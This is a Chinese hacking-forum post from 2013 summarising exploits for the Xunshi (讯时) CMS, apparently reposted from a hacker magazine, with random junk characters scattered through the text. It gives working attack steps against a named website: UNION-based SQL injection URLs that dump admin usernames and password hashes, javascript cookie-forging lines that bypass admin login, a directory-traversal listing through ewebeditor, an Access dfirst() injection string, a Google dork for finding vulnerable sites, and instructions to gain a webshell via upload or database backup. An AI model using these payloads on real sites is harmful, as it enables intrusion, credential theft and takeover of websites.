找回密码
 立即注册
查看: 3236|回复: 0
打印 上一主题 下一主题

讯时漏洞总结

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-16 21:25:50 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
by:血封忆尘# k* q% x" N- H5 f8 Z9 q& U1 i' t! @
9 a2 [# ^4 S# X, v( ]
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了(随着版本的更新)4 X! i% ]5 F! ]4 {* l2 X

; r, j3 ~2 M4 R# a- x以下本文总结来自黑防去年第9期杂志上的内容...
9 r; H# e0 F, g' b( N& E' w5 M3 _4 l" d3 L) _- r" c5 {
先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
( Z! U& X9 K3 W0 p( b+ x. R4 O- f0 e9 V9 {3 E; V% n+ ]$ o
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2 / p( `; y* ]) b# l
) I9 d3 B7 i2 v6 ]/ {7 w0 L, d! V5 `
记得千万别多了空格,我测试站的时候就发现多了空格注入不出结果的情况( b% t) ?0 m7 r
这里一个注入* K9 Z/ c# H% H$ y, v
/ h# C8 x* b$ s7 l
效果如图:' E: ^, D% [/ l; D
' Y" e4 k% O4 t" S: x

% F/ y& R7 g& g% `- \9 Y& Y* x* O* X' ^, T0 c& N* ~: E! A
这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.  ^# A5 @2 l/ p
$ p& E1 ^9 y3 ^& \
密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去; c' u/ e6 q8 X
  c. A6 |& Y  f* h
javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));. F# J0 I# g: ^' w5 [% S
4 N- R  O2 j3 R
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:% i1 p6 u8 ?. v, x4 J9 P9 U% v
* G6 D) g/ J: c
因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
( z! t/ R( B! q8 I! B; w6 M3 P& y( M" ], E' V9 ?
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
% g* x9 p. G# n9 a; G! I* d7 ^0 ]! R1 F/ W& V
访问这页面来列目录..步骤如下:5 N! p0 f0 k% ]- O/ I, O& s8 N
: e  F( i$ j5 g& E0 F* H
javascript:alert(document.cookie="admindj=1") 0 Y; K+ O% P3 O  H( O1 ^
1 q9 h7 p5 n& \* n, v) y  ?
http://www.political-security.co ... asp?id=46&dir=../../ i! ~8 w8 _" `. z
" x: h( ~8 ~) m# B
效果如图:
* `3 j) H! k; `# b$ m) M0 [4 F7 v. I  p, B

, ^- C8 A5 \# ]7 ~  W5 ^5 z6 J  v' I9 r. z- O
这样全站目录都能瞧了..找到后台目录..进去..: k; a; {8 R' O1 t! A" R# g8 ]: F

, Q. d+ ]# F) Z0 c0 s% ~/ w" O那么进了后台怎么拿shell??上传--备份就ok了..9 G! m2 _+ O1 |8 ~/ \; t

& O* x4 q6 H. h$ S( r5 \5 M那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
  h: M1 i& N$ I; x! e7 N# N* {, a, v/ V' W& S; W4 Z7 |
这个我也碰到过一次..你都可以通过列目录来实现..
9 r  _" m* r1 w  U0 P! n5 ]& j2 @) |8 |. y2 [; U
javascript:alert(document.cookie="admindj=1")
( t6 j: B) P8 U: ^2 J% z; ^- m) c  A0 e& E& g
http://www.political-security.co ... p?action=BackupData
, h, V* W$ Z' D4 k+ h% U) A1 w2 I, s: N8 _$ ~
备份ok..
( R& e/ N3 w3 T# f* d
- Y0 R2 T2 n- \8 e% {8 ^3 M& o那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?( M% h6 D4 C, C! p8 l

( S* R5 R( T9 c在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下0 Z) j& u/ G2 M
6 H% b/ G9 p1 k/ r
然后访问此页面进行注入..步骤如下:
3 B6 j+ ?2 f: j6 h* L8 l: K' `8 W  W
javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
6 [/ Y3 I& s7 C5 b
. h) n; l2 @+ Y# o然后请求admin/admin_chk.asp页面( ^4 s% W' a/ C7 w5 Z5 k4 L
9 ~# n! g9 F& ~3 s
输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%9 Q1 X5 g9 Y& t8 p7 B6 e; `
) J- N! O) S7 G+ F% m$ P* m! ^
26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin
9 u" u  N0 M* U( B, l( M
% N* I7 z6 A8 \( \$ z效果如图所示:
5 i& O( f$ T& H0 Q% Z" }# W' B2 ^7 x6 J, U1 v; Q5 N$ B

. o. R7 A& {2 S; u. u/ \( i% K7 Y
讯时漏洞2$ E  e* Q6 I: }* _4 x
google关键字:inurl:news_more.asp?lm2= (关键字很多的自己定义吧)' y0 ^; B. Y( K! @' Z% j( q$ p$ G+ e
; M. W- z3 ^. P8 _
1、/admin/admin_news_pl_view.asp?id=1' F# O* q$ Y* c& }6 q9 o
//id任意 填入以下语句
9 R. O3 b2 h1 |' Z1 C# c+ U" @
! @' `( w& D0 }% I4 t4 ^/ o6 s% r2 d2、有时1显示错误信息的时候继续往后退2,3,4,我退到11才找到了页面,郁闷!; |7 d6 K( U0 r( x8 i+ S
/ Z0 u# z: C+ S" t. X' y! v
8 p  }* d: T7 x) T" f" u
! h4 g  }1 e' ^7 |: j7 x7 E
3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username=') I  O0 D; w: B( }; _7 i4 K, {! r
3 Z. v* |$ }* o! k
0 k! [+ g. _2 |! R0 E$ c9 k

$ Q- l1 T7 K3 g8 m; j7 P. X. O6 g爆出管理员帐号和密码了
/ z8 R0 ^1 k7 S7 }) s( i
' T' K7 Q3 ^1 \3 S3 e6 `% T6 {2 h+ \% `
/ d1 t& [1 e1 K) I" ~& x) Z9 {
4、cookies进后台0 f- W# N  C1 P6 B0 Z
& i" A' g+ H& l) s. b
javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
9 F9 v, g6 `9 c0 k) V, p3 h7 P   S$ e8 \' }& W
0 |: C: l1 c  m

0 `" w% f% b$ t% N5、后台用了cookie验证,直接访问http://www.political-security.com/admin/admin_index.asp就OK了!
! k( Y. }( U( K9 y9 o7 w , f3 ~  `( \$ V

/ h) d( k# W8 p' P9 u9 O
, E$ a0 x4 S% K( I6、后台有上传和备份取SHELL不难。
+ L$ e$ E' ^8 m$ ^
, u3 f; q# ?! D# @7、讯时还有个列目录漏洞:http://www.political-security.co ... asp?id=46&dir=../... \0 T9 L  N3 ^! e( N; f
4 _" g, a9 \& ^+ A1 w$ O
逍遥复仇:我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL,有的说虽然后台显示但备份页面是存在的,登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData,我这个没有,郁闷着呢,谁还有其他办法提供一下,谢谢!
* A% {/ L7 Q5 Q7 l9 c3 u
( E+ r- q# D' D
4 [$ {$ n) }8 d7 B7 V) p: ?  F8 @: \
9 T3 R" L: \3 U3 |, q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表